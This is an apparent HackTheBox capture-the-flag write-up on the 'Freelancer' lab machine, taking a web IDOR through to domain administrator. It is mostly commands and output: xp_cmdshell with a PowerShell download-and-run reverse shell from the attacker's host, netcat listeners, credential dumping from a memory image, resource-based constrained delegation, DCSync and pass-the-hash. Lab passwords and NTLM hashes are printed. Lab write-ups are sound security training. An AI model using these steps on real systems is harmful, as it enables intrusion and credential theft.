HackTheBox : Freelancer Writeup
Intro : Hello Hackers!😀 What’s up. Hope you are all Fine. Today I will share the Writeup of HackTheBox Freelancer Machine. It starts with Web Exploitation to Shell Access and then Active Directory Exploitation to get Administrator Access. So let’s jump into it.
Nmap Scan :
So as usual we start with a Simple Nmap Scan. I got Multiple Ports are Open as it is a Windows Machine along with a Web Server.
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 nginx 1.25.5
|_http-title: Freelancer - Job Board & Hiring platform
|_http-server-header: nginx/1.25.5
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-favicon: Unknown favicon MD5: 582290CAF5F37817946D9C6A04D4AF95
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-10-03 21:29:48Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 5h00m00s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 53827/tcp): CLEAN (Couldn't connect)
| Check 2 (port 19007/tcp): CLEAN (Couldn't connect)
| Check 3 (port 55524/udp): CLEAN (Failed to receive data)
| Check 4 (port 31157/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2024-10-03T21:30:08
|_ start_date: N/A
So let’s start with Web. we also get a Domain name freelancer.htb. So add it in your Host File.
Web Enumeration :
So I visit that Page on Port 80. It is a Freelancer Website.
Here I got 2 options 1. Login as Freelancer which is not so Interesting. So 2. I try to register as an Employee.
http://freelancer.htb/employer/register/
So I registered as a User → candy.
candy : Starlox123!@#
But when I try to Login I can’t because I my Account is still not Activated.
Activation Bypass :
This Activation can easily bypassed by Password Reset of my User Account.
http://freelancer.htb/accounts/recovery/
And I reset the Password.
Now after that I can easily Logged in as Candy User.
IDOR → Admin User :
Next In the Blog page of the Site I got the Admin user and his ID.
http://freelancer.htb/accounts/profile/visit/2/
Next I start Enumeration in my Profile page and I got a QR Code function with that I can Login without a Password. Seems Interesting. So when I scan the QR I got a URL.
http://freelancer.htb/accounts/login/otp/MTAwMTU=/ad150de2eced37f1df1a7b45fe59953c/
Then I decode this string → MTAwMTU= as it is Base64 Encoded and I got this.
$ echo MTAwMTU | base64 -d
10015
Seems like it my current User ID. So we can perform IDOR Attack here. For that we need other User’s ID and we have one ID of Admin User. Let’s try to access Admin User.
For this 1st I base64 Encode the Admin’s ID → 2 then replace it with my ID.
$ echo 2 | base64
Mgo=
http://freelancer.htb/accounts/login/otp/Mgo=/ad150de2eced37f1df1a7b45fe59953c/
Then I load that URL and I got Admin Access.
Shell as sql_svc :
Now I can access this Endpoint.
http://freelancer.htb/admin/
Here I got a SQL Terminal Function. We can abuse that to get Shell Access.
1st I try to list that Database Owner Name. it is ‘sa’.
SELECT suser_sname(owner_sid) FROM sys.databases
Next I try to check if I am Sysadmin or not.
EXECUTE AS LOGIN = 'sa'
SELECT IS_SRVROLEMEMBER('sysadmin')
Yes I am. Now I’ll impersonate as sa by granting the same privileges.
EXECUTE AS LOGIN = 'sa'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'
After executing the code below, I am now sure that I am a sysadmin now.
SELECT IS_SRVROLEMEMBER('sysadmin')
Next I have to Enable xp_cmdshell Command.
EXEC sp_configure 'show advanced options', '1';RECONFIGURE;EXEC sp_configure 'xp_cmdshell', '1' ;RECONFIGURE
Now we can get Shell Access from SQL Terminal. I use this Reverse Shell Script.
Then start you Python http server in your Folder and start your Netcat Listener. And execute the Following Command.
EXEC xp_cmdshell 'powershell -c "IEX (iwr -usebasicparsing http://<tun0_ip>/shell.ps1)"'
And you will get Shell in your Netcat Listener.
$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.181] from (UNKNOWN) [10.10.11.5] 60521
SHELL> whoami
freelancer\sql_svc
Move to mikasaAckerman User :
In the Current User’s Download Folder I got a SQL Configuration File.
SHELL> dir
Directory: C:\Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/27/2024 1:52 PM 1033_ENU_LP
d----- 5/27/2024 1:52 PM redist
d----- 5/27/2024 1:52 PM resources
d----- 5/27/2024 1:52 PM x64
-a---- 9/24/2019 9:00 PM 45 AUTORUN.INF
-a---- 9/24/2019 9:00 PM 784 MEDIAINFO.XML
-a---- 9/29/2023 4:49 AM 16 PackageId.dat
-a---- 9/24/2019 9:00 PM 142944 SETUP.EXE
-a---- 9/24/2019 9:00 PM 486 SETUP.EXE.CONFIG
-a---- 5/27/2024 4:58 PM 724 sql-Configuration.INI
-a---- 9/24/2019 9:00 PM 249448 SQLSETUPBOOTSTRAPPER.DLL
In that File I got a Potential Password of Some User.
SHELL> type sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="FREELANCER\sql_svc"
SQLSVCPASSWORD="IL0v3ErenY3ager"
SQLSYSADMINACCOUNTS="FREELANCER\Administrator"
SECURITYMODE="SQL"
SAPWD="t3mp0r@ryS@PWD"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
Next I Collect all the Username from the Machine. Under User’s Folder.
$ cat users.txt
Administrator
lkazanof
lorra199
mikasaAckerman
Next I use crackmapexec to find the Valid User regarding that Password.
$ crackmapexec smb 10.10.11.5 -u users.txt -p IL0v3ErenY3ager --continue-on-success
SMB 10.10.11.5 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:freelancer.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.5 445 DC [-] freelancer.htb\Administrator:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB 10.10.11.5 445 DC [-] freelancer.htb\lkazanof:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB 10.10.11.5 445 DC [-] freelancer.htb\lorra199:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB 10.10.11.5 445 DC [+] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager
I got mikasaAckerman User has that same Password. So I use RunasCs.exe to Login as that User in the Shell.
SHELL> .\RunasCs.exe mikasaAckerman IL0v3ErenY3ager cmd.exe -r 10.10.14.181:1111
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-49372$\Default
[+] Async process 'C:\WINDOWS\system32\cmd.exe' with pid 3556 created in background.
$ nc -lvnp 1111
listening on [any] 1111 ...
connect to [10.10.14.181] from (UNKNOWN) [10.10.11.5] 60633
Microsoft Windows [Version 10.0.17763.5830]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
freelancer\mikasaackerman
C:\Users\mikasaAckerman>cd Desktop
cd Desktop
C:\Users\mikasaAckerman\Desktop>type user.txt
type user.txt
And I got the User Flag.😉
Memory Extraction :
In the Desktop Folder I got a Memory Dump File → MEMORY.7z
C:\Users\mikasaAckerman\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8954-28AE
Directory of C:\Users\mikasaAckerman\Desktop
05/28/2024 10:22 AM <DIR> .
05/28/2024 10:22 AM <DIR> ..
10/28/2023 06:23 PM 1,468 mail.txt
10/04/2023 01:47 PM 292,692,678 MEMORY.7z
10/03/2024 05:02 AM 34 user.txt
3 File(s) 292,694,180 bytes
2 Dir(s) 2,513,920,000 bytes free
So I send that in my VM to analyze that. Then I unzip it. And gave me MEMORY.DMP File.
$ 7z x MEMORY.7z
$ file MEMORY.DMP
MEMORY.DMP: MS Windows 64bit crash dump, version 15.17763, 2 processors, full dump, 4992030524978970960 pages
I use this Script to Extract the Memory Dump.
Use the Following Command.
$ ./memprocfs -device ~/Documents/freelancer/MEMORY.DMP -mount mount1
Initialized 64-bit Windows 10.0.17763
============================== MemProcFS ==============================
- Author: Ulf Frisk - pcileech@frizk.net
- Info: https://github.com/ufrisk/MemProcFS
- Discord: https://discord.gg/pcileech
- License: GNU Affero General Public License v3.0
---------------------------------------------------------------------
MemProcFS is free open source software. If you find it useful please
become a sponsor at: https://github.com/sponsors/ufrisk Thank You :)
---------------------------------------------------------------------
- Version: 5.11.7 (Linux)
- Mount Point: mount1
- Tag: 17763_a3431de6
- Operating System: Windows 10.0.17763 (X64)
==========================================================================
It will give all the Files among them you will get SAM and SYSTEM Registry Hives.
$ ls
HKLM HKU by-hive hive_files hive_memory
$ ls
0xffffd30679c0e000-unknown-unknown.reghive
0xffffd30679c46000-SYSTEM-MACHINE_SYSTEM.reghive
0xffffd30679cdc000-unknown-MACHINE_HARDWARE.reghive
0xffffd3067b257000-settingsdat-A_{c94cb844-4804-8507-e708-439a8873b610}.reghive
0xffffd3067b261000-ActivationStoredat-A_{23F7AFEB-1A41-4BD7-9168-EA663F1D9A7D}.reghive
0xffffd3067b514000-BCD-MACHINE_BCD00000000.reghive
0xffffd3067b516000-SOFTWARE-MACHINE_SOFTWARE.reghive
0xffffd3067d7e9000-DEFAULT-USER_.DEFAULT.reghive
0xffffd3067d7f0000-SECURITY-MACHINE_SECURITY.reghive
0xffffd3067d935000-SAM-MACHINE_SAM.reghive
0xffffd3067d9c4000-NTUSERDAT-USER_S-1-5-20.reghive
0xffffd3067db43000-BBI-A_{ae450ff4-3002-4d4d-921c-fd354d63ec8b}.reghive
0xffffd3067db53000-NTUSERDAT-USER_S-1-5-19.reghive
0xffffd3067dd5e000-ActivationStoredat-A_{D65833F6-A688-4A68-A28F-F59183BDFADA}.reghive
0xffffd3067e30e000-UsrClassdat-USER_S-1-5-21-3542429192-2036945976-3483670807-1121_Classes.reghive
0xffffd3067ec26000-Amcachehve-A_{da3518a3-bbc6-1dba-206b-2755382f1364}.reghive
0xffffd3067ec39000-ntuserdat-USER_S-1-5-21-3542429192-2036945976-3483670807-1121.reghive
0xffffd3067ec58000-settingsdat-A_{8a28242f-95cc-f96a-239c-d8a872afe4cc}.reghive
0xffffd3067f097000-DRIVERS-MACHINE_DRIVERS.reghive
0xffffd3067f91b000-UsrClassdat-USER_S-1-5-21-3542429192-2036945976-3483670807-500_Classes.reghive
0xffffd3067f9e7000-ntuserdat-USER_S-1-5-21-3542429192-2036945976-3483670807-500.reghive
So I use Secretsdump to Extract all the Passwords from the Hives.
$ impacket-secretsdump -sam SAM -system SYSTEM local
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa9373 - Copyright 2022 Fortra - forked by ThePorgs
PWN3D#l0rr@Armessa199
Finding Valid User regarding that Password using CrackmapExec. It is lorra199.
$ crackmapexec smb 10.10.11.5 -u users.txt -p PWN3D#l0rr@Armessa199 --continue-on-success
SMB 10.10.11.5 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:freelancer.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.5 445 DC [-] freelancer.htb\Administrator:PWN3D#l0rr@Armessa199 STATUS_LOGON_FAILURE
SMB 10.10.11.5 445 DC [-] freelancer.htb\lkazanof:PWN3D#l0rr@Armessa199 STATUS_LOGON_FAILURE
SMB 10.10.11.5 445 DC [+] freelancer.htb\lorra199:PWN3D#l0rr@Armessa199
SMB 10.10.11.5 445 DC [-] freelancer.htb\mikasaAckerman:PWN3D#l0rr@Armessa199 STATUS_LOGON_FAILURE
AD Attack :
Now here I use Bloodhound Python against the Domain.
$ bloodhound-python -c ALL -u lorra199 -p 'PWN3D#l0rr@Armessa199' -d freelancer.htb -dc freelancer.htb -ns 10.10.11.5
After uploading that in BloodHound I got the AD Recycle Bin User has Generic Write on the domain controller.
Shell as Administartor :
Here we will abuse Resource-Based Constrained Delegation. For that we will 1st add a Fake Computer to the DC controlled by me. Then I can act as the DC to request Kerberos tickets
for the fake computer giving the ability to impersonate other accounts, like Administrator.
Note : The compromised user or a group that the user is a member of must have the Write privileges over the targeted computer the attacker wants to get. The write permissions are GenericAll, GenericWrite, and WriteDACL.
I have Generic Write Permission.
$ impacket-addcomputer -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Hacker@123@' -dc-host freelancer.htb -domain-netbios freelancer.htb freelancer.htb/lorra199:'PWN3D#l0rr@Armessa199'
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa9373 - Copyright 2022 Fortra - forked by ThePorgs
[*] Successfully added machine account ATTACKERSYSTEM$ with password Hacker@123@.
Next this command allows the ATTACKERSYSTEM$ computer object to delegate write authority to the DC$ computer object so that it can perform certain actions.
$ impacket-rbcd -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'DC$' -dc-ip 10.10.11.5 -action 'write' 'freelancer.htb/lorra199:PWN3D#l0rr@Armessa199'
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa9373 - Copyright 2022 Fortra - forked by ThePorgs
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ATTACKERSYSTEM$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ATTACKERSYSTEM$ (S-1-5-21-3542429192-2036945976-3483670807-11601)
Get a specific SPN and service ticket for the cifs service using the Kerberos protocol. Using this ticket, I can impersonate a specific user.
But Error happened because of Time Sync.
$ impacket-getST -spn 'cifs/DC.freelancer.htb' -impersonate Administrator -dc-ip 10.10.11.5 'freelancer.htb/ATTACKERSYSTEM$:Hacker@123@'
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa9373 - Copyright 2022 Fortra - forked by ThePorgs
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
So we have to update the time as per the Machine and run the Command Again.
$ systemctl stop systemd-timesyncd
$ ntpdate -u 10.10.11.5
$ impacket-getST -spn 'cifs/DC.freelancer.htb' -impersonate Administrator -dc-ip 10.10.11.5 'freelancer.htb/ATTACKERSYSTEM$:Hacker@123@'Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
Next I export the ccache File.
$ export KRB5CCNAME=/home/simon/Documennts/Freelancer/bloodhound/Administrator.ccache
Then I use impacket-secretsdump to extract NTLM hash information from DC.
$ impacket-secretsdump 'freelancer.htb/Administrator@DC.freelancer.htb' -k -no-pass -dc-ip 10.10.11.5 -target-ip 10.10.11.5 -just-dc-ntlm
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e8274633445bce32ad1a290:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d238e0bfa17d575038efc070187a91c2:::
freelancer.htb\mikasaAckerman:1105:aad3b435b51404eeaad3b435b51404ee:e8d62c7d57e5d74267ab6feb2f662674:::
sshd:1108:aad3b435b51404eeaad3b435b51404ee:c1e83616271e8e17d69391bdcd335ab4:::
SQLBackupOperator:1112:aad3b435b51404eeaad3b435b51404ee:c4b746db703d1af5575b5c3d69f57bab:::
sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
lorra199:1116:aad3b435b51404eeaad3b435b51404ee:67d4ae78a155aab3d4aa602da518c051:::
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
DC$:1000:aad3b435b51404eeaad3b435b51404ee:89851d57d9c8cc8addb66c59b83a4379:::
DATACENTER-2019$:1115:aad3b435b51404eeaad3b435b51404ee:7a8b0efef4571ec55cc0b9f8cb73fdcf:::
DATAC2-2022$:1155:aad3b435b51404eeaad3b435b51404ee:007a710c0581c63104dad1e477c794e8:::
WS1-WIIN10$:1156:aad3b435b51404eeaad3b435b51404ee:57e57c6a3f0f8fff74e8ab524871616b:::
WS2-WIN11$:1157:aad3b435b51404eeaad3b435b51404ee:bf5267ee6236c86a3596f72f2ddef2da:::
WS3-WIN11$:1158:aad3b435b51404eeaad3b435b51404ee:732c190482eea7b5e6777d898e352225:::
DC2$:1159:aad3b435b51404eeaad3b435b51404ee:e1018953ffa39b3818212aba3f736c0f:::
SETUPMACHINE$:8601:aad3b435b51404eeaad3b435b51404ee:f5912663ecf2c8cbda2a4218127d11fe:::
ATTACKERSYSTEM$:12101:aad3b435b51404eeaad3b435b51404ee:ef266c6b963c0bb683941032008ad47f:::
[*] Cleaning up...
Now I can easily get into the Administrator User with his hash.
$ evil-winrm -i 10.10.11.5 -u Administrator -H 0039318f1e8274633445bce32ad1a290
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
And at last it DC Exploited. So that’s it.
THANKS FOR RAEDING!
If you like it don’t forget to Like it and Follow me for more Articles.
Linkedin Profile → https://www.linkedin.com/in/subhankar-paul-332085254/
Happy Hacking~